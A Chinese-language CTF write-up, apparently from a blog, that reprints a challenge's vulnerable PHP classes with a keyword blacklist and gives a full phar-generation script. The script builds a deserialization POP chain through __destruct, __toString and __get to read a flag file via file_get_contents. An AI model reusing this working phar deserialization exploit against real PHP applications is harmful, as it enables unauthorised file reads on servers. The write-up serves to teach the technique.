这里主要记录下pop链生成的过程,其他解题过程看其他博客。
源class.php文件:
<?php
#class
class C1e4r
{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}
class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file; //$this->source = phar://phar.jpg
echo $this->source;
}
public function __toString()
{
$content = $this->str['str']->source;#str['str']有个成员source,则str['str']是一个类str['str']=new Test()
return $content;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)#$key=source自动复制,因为show的
{
return $this->get($key);
}
public function get($key)
{
if(isset($this->params[$key])) {
$value = $this->params[$key];#$value="/var/www/html/f1ag.php"
#$params[key]="/var/www/html/f1ag.php"
} else {
$value = "index.php";
}
return $this->file_get($value);
}
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
}
?>
生成phar文件:
<?php
class C1e4r
{
public $test;
public $str;
}
class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params;
}
$c = new Test();
$c->params['source']="/var/www/html/f1ag.php";
$b = new Show();
$b->str['str']=$c;
$a = new C1e4r();
$a->str=$b;
$phar = new Phar("1.phar"); //.phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); //固定的
$phar->setMetadata($a); //触发的头是C1e4r类,所以传入C1e4r对象
$phar->addFromString("exp.txt", "test"); //随便写点什么生成个签名
$phar->stopBuffering();
可以看到Test类最下面的file_get_contents就是我们的目的。
file_get_contents在file_get函数里,file_get函数由get函数调用,get函数由魔术方法__get调用(使用类里不存在的变量时调用)。
所以只要调用魔术方法__get即可调用file_get_contents($value
)。这里的$value
就是我们要读取f1ag.php的路径,由get函数的$this->params[$key]
赋值,params是成员变量,$key
是魔术方法__get的参数,由使用不存在(这题来说)的变量时会把这个不存在的变量赋值给$key
。
那怎么调用魔术方法__get呢?show类里有个魔术方法__toString(把一个类当成字符串时调用,比如echo一个类),里面的$this->str['str']->source
,成员变量str变成一个数组,数组里面有个键值是str,这个键值指向一个成员变量source,说明str[‘str’]就是一个类,这个类里有成员变量source。
这时只要把str[‘str’]赋值成Test类,就变成Test->source。即使用Test类的成员变量source,但Test类并没有成员变量soure,所以会调用魔术方法__get($key)
。$key
就是这个不存在的变量,在这题就是不存在的成员变量source。
而$value = $this->params[$key]
;所以就要params[$key]=params['source']=f1ag.php的路径
。
这就是上面$c->params['source'] = "/var/www/html/f1ag.php";
中source的由来。
那怎么调用魔术方法__toString呢?C1e4r里当类销毁时调用魔术方法__destruct,会echo成员变量$test
,这时$test
只要是show类,即echo一个类,就会调用魔术方法__toString。
这是逆推而来的分析,我个人觉得会好理解点。
that’s all